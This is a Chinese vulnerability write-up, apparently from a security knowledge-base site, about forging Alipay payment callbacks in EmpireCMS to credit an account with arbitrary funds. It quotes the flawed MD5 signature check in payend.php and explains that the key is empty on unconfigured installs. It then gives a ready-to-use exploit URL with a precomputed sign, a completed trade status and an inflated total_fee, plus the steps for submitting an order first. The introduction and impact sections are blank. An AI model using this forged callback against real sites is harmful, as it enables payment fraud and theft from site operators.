menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right EmpireCMS 任意充值漏洞 chevron_right EmpireCMS 任意充值漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    EmpireCMS 任意充值漏洞.md
    1.22 KB / 2021-07-15 19:51:49
        EmpireCMS 任意充值漏洞
    ======================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    漏洞文件
    
    > https://www.0-sec.org/EmpireCMS/upload/e/payapi/alipay/payend.php
    
    漏洞详情
    
    首先在`/e/payapi/alipay/payend.php`
    
        $sign='';
    
        foreach($_GET AS $key=>$val)
    
        {
    
        if($key!='sign'&&$key!='sign_type'&&$key!='code')
    
        {
    
        $sign.="$key=$val&";
    
        }
    
        }
    
    
    
        $sign=md5(substr($sign,0,-1).$paykey);
    
        print($sign);
    
        if($sign!=$_GET['sign'])
    
        {
    
        printerror('验证MD5签名失败.','../../../',1,0,1);
    
    这个是sign签名的验证没有检测来源是否为支付宝链接而且没有安装情况下key为0
    
    所以我们可以自己构造sign
    
        https://www.0-sec.org/EmpireCMS/upload/e/payapi/alipay/payend.php?sign=63b90f066d744a4d53150045837bd90d&trade_status=TRADE_FINISHED&trade_no=1111&out_trade_no=aaaaaa&total_fee=11111111
    
    `sign=63b90f066d744a4d53150045837bd90d`是get的数组的md5值
    
    当然需要登录情况下还要自己手动在用户中心提交次订单,系统会设置cookie满足条件然后在到我们sign的地方
    
    提交后7.png8.png
    
    参考链接
    --------
    
    > https://man-hin.lofter.com/post/37bd50\_1c886dc36
    
    
    links
    file_download